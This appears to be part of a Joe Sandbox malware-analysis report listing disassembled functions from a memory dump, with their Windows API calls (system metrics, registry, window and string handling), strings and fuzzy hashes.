Function 6FA6CD66 Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 6FA6CD75
GetSystemMetrics.USER32(0000000C), ref: 6FA6CD7C
GetSystemMetrics.USER32(00000002), ref: 6FA6CD83
GetSystemMetrics.USER32(00000003), ref: 6FA6CD8D
GetDC.USER32(00000000), ref: 6FA6CD97
GetDeviceCaps.GDI32(00000000,00000058), ref: 6FA6CDA8
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FA6CDB0
ReleaseDC.USER32(00000000,00000000), ref: 6FA6CDB8

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 63b4eb3c72ad7c2f6e3cc0020562e61986cf4870f161dcdd78f477e20993e2f2
Instruction ID: 0ace4845f898848331ca96859b5f065bdaac3e3963769767e926d289e76c2b77
Opcode Fuzzy Hash: 63b4eb3c72ad7c2f6e3cc0020562e61986cf4870f161dcdd78f477e20993e2f2
Instruction Fuzzy Hash: BFF06DB1E40B14BAEB105B728C49F167F68EB46731F008526E6189B2C0CAB698228FD0

Function 6FA7020C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FA7029B
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FA702C4
GetWindowLongW.USER32(?,000000FC), ref: 6FA702D6
GetWindowLongW.USER32(?,000000FC), ref: 6FA702E7
SetWindowLongW.USER32(?,000000FC,?), ref: 6FA70303

Strings

,, xrefs: 6FA702BA

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 5b9b211d0fe9eff7a6e942a2477057f1bfdecaf5132e443d126b3ff3ea9ffeed
Instruction ID: 58044ca62bc2ba832ca1523e1f423969984c3c2ab7aee0ebb6e02d31cbe8cceb
Opcode Fuzzy Hash: 5b9b211d0fe9eff7a6e942a2477057f1bfdecaf5132e443d126b3ff3ea9ffeed
Instruction Fuzzy Hash: 2A31E0762007109FDB209FB4C884E5ABBB5BF49314F155629E2559B690DF3AF880CB94

Function 6FA6A200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FA6A20A
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FA6A2F0
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FA6A30D
RegCloseKey.ADVAPI32(?), ref: 6FA6A32D
RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FA6A348

Strings

Software\, xrefs: 6FA6A26E

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 5ea632f39f051c331bf541b66d54065b0b2c7b1ceddb21f9819d1b67cee23fa1
Instruction ID: 69bc3964879551c4ef73c385641af51493a0b6db1d43ca44f3147598162bc819
Opcode Fuzzy Hash: 5ea632f39f051c331bf541b66d54065b0b2c7b1ceddb21f9819d1b67cee23fa1
Instruction Fuzzy Hash: 25418431901628ABCF21EBA4DD88EDEB7B9AF49314F1406D5E119E2290DB789FC5CF50

Function 6FA6A082 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6FA6A08C
RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FA6A11A
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FA6A13D

Part of subcall function 6FA6A02D: __EH_prolog3.LIBCMT ref: 6FA6A034

Strings

Software\Classes\, xrefs: 6FA6A0CD

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: 3c4b9c626cb1f19e95423153d8a49b30c7078c9d56d14a69f1a2b1d5927f901e
Instruction ID: b0d2b28baab0cb54ab18215c5f8ac7b04b5972791b91f8d42a9a7c29487cbbc6
Opcode Fuzzy Hash: 3c4b9c626cb1f19e95423153d8a49b30c7078c9d56d14a69f1a2b1d5927f901e
Instruction Fuzzy Hash: AD31A135C04238ABCB21ABA4DD48BDDBBB5AF09324F1402D5E869A7290CB785FC4DF50

Function 6FA6D07E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FA6D0AE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FA6D0D1
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FA6D0ED
RegCloseKey.ADVAPI32(?), ref: 6FA6D0FD
RegCloseKey.ADVAPI32(?), ref: 6FA6D107

Strings

software, xrefs: 6FA6D096

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ba6de1a4fa5386a552077766ea23a832013c2c6023c66610913434ee009cc799
Instruction ID: acc2f81aec668325abb9b84b4b8a7ef79ce4cf7099f6a9571c71a2868de50e54
Opcode Fuzzy Hash: ba6de1a4fa5386a552077766ea23a832013c2c6023c66610913434ee009cc799
Instruction Fuzzy Hash: D2112872D00118FB8B21DB8ACD88CDFBFBDEFCA750B2040AAF515A2111D7709A51DBA0

Function 6FA6BEAE Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 6FA6BEB5
__CxxThrowException@8.LIBCMT ref: 6FA6BEBF

Part of subcall function 6FA7527B: RaiseException.KERNEL32(?,00000003,000000FF,6FA6279F), ref: 6FA752BD

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?), ref: 6FA6BED6
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BEE3

Part of subcall function 6FA66D89: __CxxThrowException@8.LIBCMT ref: 6FA66D9F

_memset.LIBCMT ref: 6FA6BF02
TlsSetValue.KERNEL32(?,00000000,?), ref: 6FA6BF13
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BF34

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 07c79af0b2ab859f63da748c58ab34d84566140f252f0e13989d10bcf35ba4e4
Instruction ID: fba405c979032665f6af1d5688ea5f5f0d77c0fb823431728438884966406ce4
Opcode Fuzzy Hash: 07c79af0b2ab859f63da748c58ab34d84566140f252f0e13989d10bcf35ba4e4
Instruction Fuzzy Hash: 89115E74100B05AFDB20AF64CD85C2ABBB5FF06364750C529F66596664CF35ECA1CF90

Function 6FA6CA77 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000), ref: 6FA6CA85
SetErrorMode.KERNEL32(00000000), ref: 6FA6CA8D

Part of subcall function 6FA6A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FA6A6D0
Part of subcall function 6FA6A698: SetLastError.KERNEL32(0000006F), ref: 6FA6A6E7

GetModuleHandleW.KERNEL32(user32.dll), ref: 6FA6CADC
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FA6CAEC

Strings

user32.dll, xrefs: 6FA6CAD7
NotifyWinEvent, xrefs: 6FA6CAE6

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Error$ModeModule$AddressFileHandleLastNameProc
String ID: NotifyWinEvent$user32.dll
API String ID: 1146408833-597752486
Opcode ID: 65f9e3198b3d21eb8cbbcd1b6d7abfac9986ec5afe92e1e057d1d69dd1241987
Instruction ID: a10495e0b38b4429750039214006e90cce38acf5e26e867b50c1134f8e83a293
Opcode Fuzzy Hash: 65f9e3198b3d21eb8cbbcd1b6d7abfac9986ec5afe92e1e057d1d69dd1241987
Instruction Fuzzy Hash: A101DF709143244FCB10EFA48A08A5A3FA9AF49B20B05805AF928DB380DF78D880CF61

Function 6FA6CD20 Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 6FA6CD2E
GetSysColor.USER32(00000010), ref: 6FA6CD35
GetSysColor.USER32(00000014), ref: 6FA6CD3C
GetSysColor.USER32(00000012), ref: 6FA6CD43
GetSysColor.USER32(00000006), ref: 6FA6CD4A
GetSysColorBrush.USER32(0000000F), ref: 6FA6CD57
GetSysColorBrush.USER32(00000006), ref: 6FA6CD5E

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: d0ec29eb1ae91e47db3e773fc57b1d2a3b9c478a37aece47d29758377edcf5ae
Instruction ID: 58dc72ec106ab683f564322e570120629bf18bc56eea93bf7850b49fdc9144d3
Opcode Fuzzy Hash: d0ec29eb1ae91e47db3e773fc57b1d2a3b9c478a37aece47d29758377edcf5ae
Instruction Fuzzy Hash: EAF012719407445BDB30BF724D09B47BAD1FFC5720F16092EE2458BA90DAB6E451DF40

Function 6FA6815A Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6FA6818D
GetParent.USER32(?), ref: 6FA6819B
GetParent.USER32(?), ref: 6FA681AE
GetLastActivePopup.USER32(?), ref: 6FA681BF
IsWindowEnabled.USER32(?), ref: 6FA681D3
EnableWindow.USER32(?,00000000), ref: 6FA681E6

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 496fcfa551cbf94e996c2f8c1f652a0dfbb32951869d54537a1e116f68a277c9
Instruction ID: c8af1edd5851168ee8ae2eb931bbcdf678a8dd0c10ad9f5b4fad27faf8538d01
Opcode Fuzzy Hash: 496fcfa551cbf94e996c2f8c1f652a0dfbb32951869d54537a1e116f68a277c9
Instruction Fuzzy Hash: 3011067260DB20ABD7120A698D44B9A73ACAF47F60F0D4112FC24EB240CB6CE9C2C7D1

Function 6FA7C416 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6FA7C43E

Part of subcall function 6FA74FC4: __getptd.LIBCMT ref: 6FA74FD2
Part of subcall function 6FA74FC4: __getptd.LIBCMT ref: 6FA74FE0

__getptd.LIBCMT ref: 6FA7C448

Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F

__getptd.LIBCMT ref: 6FA7C456
__getptd.LIBCMT ref: 6FA7C464
__getptd.LIBCMT ref: 6FA7C46F
_CallCatchBlock2.LIBCMT ref: 6FA7C495

Part of subcall function 6FA75069: __CallSettingFrame@12.LIBCMT ref: 6FA750B5

Part of subcall function 6FA7C53C: __getptd.LIBCMT ref: 6FA7C54B
Part of subcall function 6FA7C53C: __getptd.LIBCMT ref: 6FA7C559

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 7b1fc9a49dc1a69d5adc6d356d718ffc8851d93567fe25dba3563baaabcbfd19
Instruction ID: 65036a99256ed2bda391dc5aed07d7e363d49f4fa2ea6a44d3320d021836e517
Opcode Fuzzy Hash: 7b1fc9a49dc1a69d5adc6d356d718ffc8851d93567fe25dba3563baaabcbfd19
Instruction Fuzzy Hash: EB11D7B5C04309EFDF10DFA4C944A9D7BB1FF14319F108169E814A72A0EB799A91DF90

Function 6FA6DB5C Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 6FA6DB6D
GetDlgCtrlID.USER32(00000000), ref: 6FA6DB81
GetWindowLongW.USER32(00000000,000000F0), ref: 6FA6DB91
GetWindowRect.USER32(00000000,?), ref: 6FA6DBA3
PtInRect.USER32(?,?,?), ref: 6FA6DBB3
GetWindow.USER32(?,00000005), ref: 6FA6DBC0

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 0dcac91e0aff8a7fa64a9764126029cbbd53c6bf63411c1ad43a2a0c81c39106
Instruction ID: df5c96968743dc6b0495cbfea9be10a4259dc45d98e61b997d0fc5bf287c06f2
Opcode Fuzzy Hash: 0dcac91e0aff8a7fa64a9764126029cbbd53c6bf63411c1ad43a2a0c81c39106
Instruction Fuzzy Hash: 7101A272104619BBCF015B55CC08E9E3B6DFF4B7A0F188121F921E6184DB78E562CB94

Function 6FA72932 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FA72962

Strings

AfxMDIFrame90su, xrefs: 6FA72A03
AfxFrameOrView90su, xrefs: 6FA72A28
@, xrefs: 6FA72B07
@, xrefs: 6FA72A6E

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
API String ID: 2102423945-1093365818
Opcode ID: 42c2f4ce413a8d9d2a322ec09a5bfdffdd2c03398b2dc01ad1b9a446f347318e
Instruction ID: 1ad81d1012890bd9bbb85148bfd839e80d2a576ce16125a92527faf9b71186b8
Opcode Fuzzy Hash: 42c2f4ce413a8d9d2a322ec09a5bfdffdd2c03398b2dc01ad1b9a446f347318e
Instruction Fuzzy Hash: B2912475D0030DAEDB60CFA4C585FDEBBF8AF44344F149166E918E6181EB7896C4CBA4

Function 6FA696DA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 6FA696F2
_memset.LIBCMT ref: 6FA6976A
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FA697CD
LoadBitmapW.USER32(00000000,00007FE3), ref: 6FA697E5

Strings

, xrefs: 6FA6974B

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 9ce4f4873e471a3cbca310e5d7f44db774d0e9c82abd085fd8403bb189552fff
Instruction ID: 69fc6fc6424665b2b5e2de4e6a4a6aaf11d62a4f706ce1a6afa8c256fe6330aa
Opcode Fuzzy Hash: 9ce4f4873e471a3cbca310e5d7f44db774d0e9c82abd085fd8403bb189552fff
Instruction Fuzzy Hash: C9313572A003249FEF208F288DC4B997BB8FB49350F4980B6E548DB2C1DF7599868F50

Function 6FA7C165 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FA7C17F

Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F

__getptd.LIBCMT ref: 6FA7C190
__getptd.LIBCMT ref: 6FA7C19E

Strings

MOC, xrefs: 6FA7C171
csm, xrefs: 6FA7C178

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
Instruction ID: 6dd39e4d2081363402f83b810db3fefd5f93b98b1bc6e1a08897b3c76df1016f
Opcode Fuzzy Hash: 8c112de8ba61407736256011eba1e9c09d59243f4efd8b177e32e0b804c32463
Instruction Fuzzy Hash: F6E04F7A5182049FDB209BB4C145F5937A5EF69718F1901A1D50CCB272DF3DE5C0D982

Function 6FA65670 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,6FA649D6,?,00000003), ref: 6FA65685
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FA656B4
GetLastError.KERNEL32 ref: 6FA656C5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FA656E5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FA65709

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: bca4763de0306d5aad11eb91d1286bc5ff7db5b58cd5a3a7ae80b8ea5c64642d
Instruction ID: 7b0a48164c55cb64f54311e00449a4e766fe0b7dee90446e632f3d7c69449923
Opcode Fuzzy Hash: bca4763de0306d5aad11eb91d1286bc5ff7db5b58cd5a3a7ae80b8ea5c64642d
Instruction Fuzzy Hash: A4119D75384305AFE6209F68CC80F6777A8EB89714F100D28B65196281EAA4BC498760

Function 6FA6DA11 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 6FA6DA3D
_memset.LIBCMT ref: 6FA6DA5B
GetWindowTextW.USER32(00000000,?,00000100), ref: 6FA6DA75
lstrcmpW.KERNEL32(?,?,?,?), ref: 6FA6DA87
SetWindowTextW.USER32(00000000,?), ref: 6FA6DA93

Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

